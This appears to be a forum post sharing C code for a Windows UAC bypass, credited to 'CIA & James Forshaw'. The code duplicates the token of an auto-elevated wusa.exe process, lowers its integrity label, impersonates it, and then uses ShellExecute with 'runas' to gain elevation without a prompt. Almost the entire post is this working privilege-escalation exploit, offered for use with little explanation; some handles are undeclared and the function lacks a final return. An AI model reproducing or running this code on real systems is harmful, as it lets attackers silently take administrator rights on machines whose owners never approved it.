This is an implementation of uac bypass method (Author: CIA & James Forshaw).
Works from windows 7 to latest windows 10 fall creators update.
Code:
int StepOverUAC()
{
SECURITY_ATTRIBUTES sa;
sa.nLength = sizeof(SECURITY_ATTRIBUTES);
sa.bInheritHandle = TRUE;
sa.lpSecurityDescriptor = NULL;
if (!CreatePipe(&inRead, &inWrite, &sa, 0))
return 0;
if (!CreatePipe(&outRead, &outWrite, &sa, 0))
return 0;
NtSetInformationToken nt = (NtSetInformationToken)GetProcAddress(LoadLibraryA("ntdll.dll"), "NtSetInformationToken");
RtlLengthSid rts = (RtlLengthSid)GetProcAddress(LoadLibraryA("ntdll.dll"), "RtlLengthSid");
NtFilterToken filter = (NtFilterToken)GetProcAddress(LoadLibraryA("ntdll.dll"), "NtFilterToken");
DWORD Error, bytesIO;
NTSTATUS Status;
HANDLE hProcessToken = NULL, hNewToken = NULL, hTest;
HANDLE filterToken = NULL;
BOOL bCond = FALSE;
SHELLEXECUTEINFO shinfo, sh;
SID_IDENTIFIER_AUTHORITY MLAuthority = SECURITY_MANDATORY_LABEL_AUTHORITY;
TOKEN_MANDATORY_LABEL tml, *ptml;
PSID pIntegritySid = NULL;
STARTUPINFO si, si2;
PROCESS_INFORMATION pi, pi2;
WCHAR szBuffer[MAX_PATH];
RtlSecureZeroMemory(&shinfo, sizeof(shinfo));
shinfo.cbSize = sizeof(shinfo);
shinfo.fMask = SEE_MASK_NOCLOSEPROCESS;
shinfo.lpFile = L"wusa.exe";
shinfo.nShow = SW_HIDE;
if (!ShellExecuteEx(&shinfo))
return 0;
if (!OpenProcessToken(shinfo.hProcess, MAXIMUM_ALLOWED, &hProcessToken))
return 0;
TerminateProcess(shinfo.hProcess, -1);
WaitForSingleObject(shinfo.hProcess, -1);
if (!DuplicateTokenEx(hProcessToken, TOKEN_ALL_ACCESS, NULL, SecurityImpersonation, TokenPrimary, &hNewToken))
return 0;
if (!AllocateAndInitializeSid(&MLAuthority, 1, SECURITY_MANDATORY_MEDIUM_RID,0, 0, 0, 0, 0, 0, 0, &pIntegritySid))
return 0;
tml.Label.Attributes = SE_GROUP_INTEGRITY;
tml.Label.Sid = pIntegritySid;
Status = nt(hNewToken, TokenIntegrityLevel, &tml, sizeof(tml));
if (!NT_SUCCESS(Status))
return 0;
filter(hNewToken, 0x4, NULL, NULL, NULL, &filterToken);
if (!ImpersonateLoggedOnUser(filterToken))
return 0;
}
After this just use ShellExecute with "runas" verb.